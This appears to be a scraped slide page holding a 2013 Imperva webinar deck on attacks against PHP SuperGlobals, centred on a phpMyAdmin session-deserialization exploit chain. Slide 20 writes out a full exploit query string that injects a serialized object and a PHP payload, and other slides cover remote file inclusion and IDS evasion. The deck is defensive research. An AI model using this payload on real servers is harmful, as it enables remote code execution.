Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

PHP SuperGlobals: Supersized Trouble

  • 1. © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble Confidential1 Tal Be’ery, Web Security Research Team Leader
  • 2. © 2013 Imperva, Inc. All rights reserved. Agenda Confidential2 §  Introduction •  Relevant PHP background §  An anatomy of a modern web exploit •  Abusing SuperGlobals §  Additional PHP SuperGlobal attacks •  In the wild §  Summary & conclusions §  Q&A
  • 3. © 2013 Imperva, Inc. All rights reserved. HII Reports Confidential3 §  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice •  A different approach from vulnerability research §  Data set composition •  ~60 real world applications •  Anonymous Proxies §  More than 24 months of data §  Powerful analysis system •  Combines analytic tools with drill down capabilities
  • 4. © 2013 Imperva, Inc. All rights reserved. Tal Be’ery,Web Research Team Leader Confidential4 §  Web Security Research Team Leader at Imperva §  Holds MSc & BSc degree in CS/EE from TAU §  10+ years of experience in IS domain §  Facebook “white hat” §  Speaker at RSA, BlackHat, AusCERT §  Columnist for securityweek.com §  CISSP
  • 5. © 2013 Imperva, Inc. All rights reserved. Introduction Confidential5 Relevant PHP Background
  • 6. © 2013 Imperva, Inc. All rights reserved. §  The most popular server-side programming language in the world: §  And goes from strength to strength Breadth and Depth of PHP - I Confidential6
  • 7. © 2013 Imperva, Inc. All rights reserved. §  The most popular web applications are powered by PHP Breadth and Depth of PHP – II http://www.alexa.com/topsites Confidential7
  • 8. © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals Confidential8 §  Most programing languages support different scopes for variables, primarily the “local” and the “global” scope. §  Global variables •  Provide a simple channel for cross-function communication •  More risky, as *ANY* function may change them §  PHP has several predefined variables that are called SuperGlobals. §  SuperGlobals provide access to the server’s core functionality – cookies, sessions, environment, etc. §  SuperGlobals variables are available to the PHP script in all scopes, with no need for explicit declaration.
  • 9. © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobal List Confidential9   Variable   Definition   1   GLOBALS   References all variables available in global scope   2   _SERVER   Server and execution environment information   3   _GET   HTTP GET variables   4   _POST   HTTP POST variables   5   _FILES   HTTP File upload variables   6   _COOKIE   HTTP Cookies   7   _SESSION   Session variables   8   _REQUEST   HTTP Request variables   9   _ENV   Environment variables  
  • 10. © 2013 Imperva, Inc. All rights reserved. External Variable Modification: A PHP Specific Weakness Confidential10 §  MITRE had assigned a specific CWE (Common Weakness Enumeration) code for the External Variable Modification weakness: CWE-473 §  “A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies”. §  SuperGlobals are a natural target: •  Exist in every PHP application •  Provide access to the server’s core functionality
  • 11. © 2013 Imperva, Inc. All rights reserved. Anatomy of a Modern Web Exploit Confidential11 Exploiting SuperGlobals
  • 12. © 2013 Imperva, Inc. All rights reserved. PHPMyAdmin (PMA) Confidential12 §  The most popular MySQL administration tool for PHP §  Often is bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations
  • 13. © 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: PhpMyAdmin Vulnerability Confidential13 §  PhpMyAdmin’s Unset session functionality §  Parse_str() : parses the given query string and stores the variables in the current scope. As a result, *ALL* request variables are imported into the function’s local scope. §  Session_write_close(): Makes Session data persistent throughout the entire user’s session. Session data is implicitly written to a local file on the server.
  • 14. © 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: Exploit Confidential14 §  An attacker can now •  Craft a malicious query string with the _SESSION SuperGlobal •  Injected _SESSION value overrides the session’s original values •  New values are saved to local file
  • 15. © 2013 Imperva, Inc. All rights reserved. Serialization Explained Confidential15 §  The process of saving data stored in memory to file is called “serialization” §  The process of loading data stored in file to memory is called “deserialization” Source: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
  • 16. © 2013 Imperva, Inc. All rights reserved. §  Discovered by Stefan Esser - Late 2010 §  Attacker can write data to the session in *ANY* format, if the session variable name starts with ‘!’ CVE-2010-3065 PHP Vulnerability & Exploit Confidential16
  • 17. © 2013 Imperva, Inc. All rights reserved. PMA Session Deserialization: Vulnerability Confidential17 §  On session deserialization, the load() function is called §  Eval is evil! •  Can be used to execute unexpected code §  But in order to exploit, attackers need to first specify a valid source (= session filename )
  • 18. © 2013 Imperva, Inc. All rights reserved. Guessing Session Filename: Theory Confidential18 §  Luckily for the attacker, the location of the session file is predictable §  Session file name consists of •  The “sess_” prefix •  The session identifier – known to the user/attacker §  File’s path is predictable •  default values
  • 19. © 2013 Imperva, Inc. All rights reserved. Guessing Session Filename: In the Wild Confidential19 §  Multiple guesses for path the same session file (“sess_19qq…”)
  • 20. © 2013 Imperva, Inc. All rights reserved. The Final Exploit Confidential20 §  Now the attackers can, *FINALLY*, get their code evaluated §  /phpMyAdmin/index.php?session_to_unset=123& token=86498ff0a666f808df76ffaabee9b7a3& _SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1: {s:6:“source";s:59:"/var/lib/php5/ sess_6a3e0376fbfe9797081a 3ee202ef1ca85c451a62";}}& _SESSION[payload]=<?php phpinfo(); ?>
  • 21. © 2013 Imperva, Inc. All rights reserved. Exploit Result Confidential21 §  Arbitrary PHP code is executed
  • 22. © 2013 Imperva, Inc. All rights reserved. PMA SuperGlobal Attacks In the Wild Confidential22 §  Attacks source is a hacked server §  Attacks (at least) two other servers §  Attacks persist over half a year
  • 23. © 2013 Imperva, Inc. All rights reserved. A Modern Exploit Summary: Research Confidential23 §  Sophisticated research §  Combines multiple vulnerabilities and issues in multiple domains •  PHPMyAdmin (PMA) •  PHP internals
  • 24. © 2013 Imperva, Inc. All rights reserved. A Modern Exploit Summary: Development Confidential24 §  Exploit packed in a single, “click once” PHP script §  Automates the different attack stages §  Can be launched from infected servers to infect others
  • 25. © 2013 Imperva, Inc. All rights reserved. Additional PHP SuperGlobal Attacks Confidential25 In the Wild
  • 26. © 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets – I Confidential26 §  Specific vulnerabilities exploit – such as the previously discussed PMA attack §  RFI (Remote File Inclusion): trying to overwrite “Server[document_root]” to point to external resource
  • 27. © 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets – II Confidential27 §  Part of general scanning against the site – Nikto, Acunetix, Nessus §  IDS filter evasion: SuperGlobal Provide an alternative way to represent HTTP query parameters •  “_REQUEST[Itemid]=1” request parameter is equivalent to “Itemid=1” in every way •  However, it evades a naïve IDS signature that blacklists “Itemid=1” •  We have seen these evasion technique applied on several CVEs
  • 28. © 2013 Imperva, Inc. All rights reserved. SuperGlobals In the Wild Confidential28 §  During May 2013: §  3.5K requests that manipulated PHP SuperGlobal variables. §  27 different attack sources §  24 web applications as targets
  • 29. © 2013 Imperva, Inc. All rights reserved. Targeted SuperGlobal Confidential29 §  Some SuperGlobals are more targeted than others §  The more targeted SuperGlobals provide access to more sensitive resources GLOBALS 55% ENV 14% SERVER 14% SESSION 13% REQUEST 4%
  • 30. © 2013 Imperva, Inc. All rights reserved. Summary & Conclusions Confidential30
  • 31. © 2013 Imperva, Inc. All rights reserved. The Importance of a Positive Security Model Confidential31 §  The essence of the external variable manipulation weakness: the attacker has the ability to send out external parameters with the same name of internal variables, and thus override the value of the latter. §  External parameters are not part of the standard interface of the targeted application §  Blocking all of the internal variables’ names might be difficult with a negative security approach §  But trivial with a positive security mechanism that specifies the allowed parameter names for each resource
  • 32. © 2013 Imperva, Inc. All rights reserved. Layered Application Layer Mechanisms Confidential32 §  Bad news: attackers can create a complex exploit by combining several vulnerabilities together §  Good news: it’s enough to break one of the links in the kill chain to break the chain altogether . §  Application layer solution that combines multiple detection mechanisms: •  Positive security model •  Negative security model for generic issues (generic directory traversal protection for this case) •  Specific CVE detection, is crucial for effective mitigations of such complex attacks.
  • 33. © 2013 Imperva, Inc. All rights reserved. Third-Party Code Perils Confidential33 §  Attackers target popular applications such as the PhpMyAdmin (PMA) utility installation. §  PMA is often bundled with other applications. §  Having this vulnerable utility present on the server, even if it is not being used, exposes the server to code execution attacks. §  Since administrators are not necessarily aware of all the bundled software, an “opt out” security model is needed. §  A way to achieve such an “opt out” security model is by deploying a Web Application Firewall (WAF) with constant updates of security content.
  • 34. © 2013 Imperva, Inc. All rights reserved. SuperGlobal Parameters In Requests Should Be Blocked Confidential34 §  There is no reason for these parameters to be present in valid requests, they should be banned. §  Imperva’s WAF customers received a content update to their Web Application Firewall on January 15th 2013.
  • 35. © 2013 Imperva, Inc. All rights reserved. Summing Up Confidential35 §  Establish a positive security model §  Use layered application layer security mechanisms §  Beware of third-party code perils §  Block SuperGlobal parameters in requests
  • 36. © 2013 Imperva, Inc. All rights reserved. Webinar Materials Confidential36 Post-Webinar Discussions Answers to Attendee Questions Webinar Recording Link Join Group Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
  • 37. © 2013 Imperva, Inc. All rights reserved. www.imperva.com Confidential37